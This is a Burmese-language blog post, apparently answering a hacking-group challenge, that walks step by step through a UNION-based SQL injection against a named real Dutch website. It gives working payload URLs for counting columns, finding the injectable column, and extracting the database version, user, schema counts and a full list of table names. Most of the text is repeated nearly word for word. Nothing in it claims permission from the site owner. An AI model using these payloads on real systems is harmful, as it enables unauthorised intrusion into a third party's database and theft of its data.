က်ေနာ့္ ခ်ဲလန္႔ ရဲ႕ အေျဖေလးပါ ခညာ
မေျဖနိုင္တဲ့သူေတြအတြက္ပါ ေျဖနိုင္တဲ့သူေတြေတာ့ ေက်ာ္ဖတ္သြားပါေနာ္ ဟိဟိ
http://www.muziekhuis.nl/article.php?id=180
က်ေနာ္ တို႔ ပထမဆံုး ဒီဆိုက္ကို ' နဲ႕ တခ်က္စစ္ၾကည့္လိုက္မယ္
ေအာက္ကလို error ေတြ႕ရပါမယ္
error တက္ၿပီဆိုေတာ့ ဆက္သြားမယ္ order by ကိုသံၿပီး က်ေနာ္တို႔ column ရွာမယ္
http://www.muziekhuis.nl/article.php?id=180 order by 17-- <no error>
http://www.muziekhuis.nl/article.php?id=180 order by 18-- <no error>
http://www.muziekhuis.nl/article.php?id=180 order by 19--
ေအာက္ကလို error မိ်ဳးက်လာပီဆိုရင္ ေတာ့ က်ေနာ္တို႔ column ၁၈ ခုရွိတယ္ဆိုတာသိရပါၿပီ
က်ေနာ္ တုိ႕ vulnerable ျဖစ္ေနတဲ့ column ကိုရွာဖို႕ union select ကိုသံုးမယ္
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
and 0 ဆိုတာ က id=-180 နဲ႕ ပံုစံတူပါဘဲ error တက္ေအာင္ထည့္ထားတာပါ
ခုလို စစ္လိုက္ ရင္ ေအာက္ကပံုမ်ိဳးနဲ႕ ျမင္ရပါမယ္။
ဟုတ္ၿပီ ဒါဆို က်ေနာ္တို႔ vul column လည္းသိၿပီ ေပါ့
proof လုပ္ရမွာ ကိုတခ်က္ၾကည့္မယ္။
A: version with your name
B:user
C:Number of DB
D:Number of Table
E:Number of Column
F:Dump all tables
A:version with yourname
ပထမဆံုး က်ေနာ္တို႕ version & name ကို inject လုပ္ၾကည့္မယ္။vul column ထဲမွာ သြားထည့္မယ္
concat(rEvolt!(or)yourname : version())
query ကဒီလိုျဖစ္သြားမယ္။
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
run ၾကည့္လိုက္မယ္ဆိုရင္ေအာက္ကလို မိ်ဳးရမယ္
ဒါဆို A ၿပီးသြားၿပီ
B:user
user() ဆိုတဲ့ query သံုးမယ္။လွလွပပ ေလးျဖစ္ေအာင္တေၾကာင္းဆင္းလိုက္မယ္။<br> ကိုသံုးမယ္။
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္ကလို ပံုစံမ်ိဳးျဖစ္သြားမယ္
ဟုတ္ၿပီ က်ေနာ္တို႔ B လည္းရသြားၿပီ။
C:Number of Database
Database ေတြကို count လုပ္ဖို႕အတြက္ <br>,(select count(*) from information_schema.schemata) ကိုသံုးမယ္။
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္ကပံုလိုမ်ိဳးျဖစ္သြားမယ္
C လည္းရပီ
D:number of table(without information_schema)
က်ေနာ္ခ်ဲလန္႕ တင္တုန္းက သိပ္မရွင္းေသးလို႕ မတူၾကေတာ့တာပါ။
အဲ့တုန္းက မသိေသးလို႔ေနာ္ ဟိဟိ
<br>,(select count(*) from information_schema.tables where table_schema!=0xinformation_schema)
!= ဆိုတာက information_schema နဲ႔ မညီတာေတြလို႔ ေျပာခ်င္တာပါ။
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata),0x3c62723e,(select count(*) from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္ကလို ပံုေလးရၿပီ
D ရသြားျပန္ၿပီ
E:column (without information_schema)
<br>,(select count(*) from information_schema.columns where table_schema!=0xinformation_schema)
query အျပည့္အစံုက
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata),0x3c62723e,(select count(*) from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61),0x3c62723e,(select count(*) from information_schema.columns where table_schema!=0x696e666f726d6174696f6e5f736368656d61)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္မွာ ေပၚလာမယ့္ပံုစံပါ
ီD: ရတြားပီ တခုပဲက်န္ေတာ့တယ္
E: dump all tables
(select (@x) from (select (@x:0x00),(select(0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)
ကိုသံုးမယ္
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata),0x3c62723e,(select count(*) from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61),0x3c62723e,(select count(*) from information_schema.columns where table_schema!=0x696e666f726d6174696f6e5f736368656d61),(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)
where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)
),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ဒီလို ဆိုရင္ ေအာက္ကပံုလို ျဖစ္သြားမယ္
ခု ခ်ဲလန္႔ ေျဖလို႔ပီးသြားၿပီ
ေက်းဇူးပါ ခမ်ာ....
မေျဖနိုင္တဲ့သူေတြအတြက္ပါ ေျဖနိုင္တဲ့သူေတြေတာ့ ေက်ာ္ဖတ္သြားပါေနာ္ ဟိဟိ
http://www.muziekhuis.nl/article.php?id=180
က်ေနာ္ တို႔ ပထမဆံုး ဒီဆိုက္ကို ' နဲ႕ တခ်က္စစ္ၾကည့္လိုက္မယ္
ေအာက္ကလို error ေတြ႕ရပါမယ္
http://www.muziekhuis.nl/article.php?id=180 order by 17-- <no error>
http://www.muziekhuis.nl/article.php?id=180 order by 18-- <no error>
http://www.muziekhuis.nl/article.php?id=180 order by 19--
ေအာက္ကလို error မိ်ဳးက်လာပီဆိုရင္ ေတာ့ က်ေနာ္တို႔ column ၁၈ ခုရွိတယ္ဆိုတာသိရပါၿပီ
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
and 0 ဆိုတာ က id=-180 နဲ႕ ပံုစံတူပါဘဲ error တက္ေအာင္ထည့္ထားတာပါ
ခုလို စစ္လိုက္ ရင္ ေအာက္ကပံုမ်ိဳးနဲ႕ ျမင္ရပါမယ္။
ဟုတ္ၿပီ ဒါဆို က်ေနာ္တို႔ vul column လည္းသိၿပီ ေပါ့
proof လုပ္ရမွာ ကိုတခ်က္ၾကည့္မယ္။
A: version with your name
B:user
C:Number of DB
D:Number of Table
E:Number of Column
F:Dump all tables
A:version with yourname
ပထမဆံုး က်ေနာ္တို႕ version & name ကို inject လုပ္ၾကည့္မယ္။vul column ထဲမွာ သြားထည့္မယ္
concat(rEvolt!(or)yourname : version())
query ကဒီလိုျဖစ္သြားမယ္။
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
run ၾကည့္လိုက္မယ္ဆိုရင္ေအာက္ကလို မိ်ဳးရမယ္
B:user
user() ဆိုတဲ့ query သံုးမယ္။လွလွပပ ေလးျဖစ္ေအာင္တေၾကာင္းဆင္းလိုက္မယ္။<br> ကိုသံုးမယ္။
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္ကလို ပံုစံမ်ိဳးျဖစ္သြားမယ္
C:Number of Database
Database ေတြကို count လုပ္ဖို႕အတြက္ <br>,(select count(*) from information_schema.schemata) ကိုသံုးမယ္။
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္ကပံုလိုမ်ိဳးျဖစ္သြားမယ္
D:number of table(without information_schema)
က်ေနာ္ခ်ဲလန္႕ တင္တုန္းက သိပ္မရွင္းေသးလို႕ မတူၾကေတာ့တာပါ။
အဲ့တုန္းက မသိေသးလို႔ေနာ္ ဟိဟိ
<br>,(select count(*) from information_schema.tables where table_schema!=0xinformation_schema)
!= ဆိုတာက information_schema နဲ႔ မညီတာေတြလို႔ ေျပာခ်င္တာပါ။
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata),0x3c62723e,(select count(*) from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္ကလို ပံုေလးရၿပီ
D ရသြားျပန္ၿပီ
E:column (without information_schema)
<br>,(select count(*) from information_schema.columns where table_schema!=0xinformation_schema)
query အျပည့္အစံုက
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata),0x3c62723e,(select count(*) from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61),0x3c62723e,(select count(*) from information_schema.columns where table_schema!=0x696e666f726d6174696f6e5f736368656d61)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ေအာက္မွာ ေပၚလာမယ့္ပံုစံပါ
E: dump all tables
(select (@x) from (select (@x:0x00),(select(0) from (information_schema.tables) where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)
ကိုသံုးမယ္
query က
http://www.muziekhuis.nl/article.php?id=180 and 0 UNION SELECT 1,concat(0x7245766f6c7421,0x3a,version(),0x3c62723e,user(),0x3c62723e,(select count(*) from information_schema.schemata),0x3c62723e,(select count(*) from information_schema.tables where table_schema!=0x696e666f726d6174696f6e5f736368656d61),0x3c62723e,(select count(*) from information_schema.columns where table_schema!=0x696e666f726d6174696f6e5f736368656d61),(select (@x) from (select (@x:=0x00),(select (0) from (information_schema.tables)
where (table_schema=database()) and (0x00) in (@x:=concat(@x,0x3c62723e,table_name))))x)
),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--
ဒီလို ဆိုရင္ ေအာက္ကပံုလို ျဖစ္သြားမယ္
ေက်းဇူးပါ ခမ်ာ....
No comments:
Post a Comment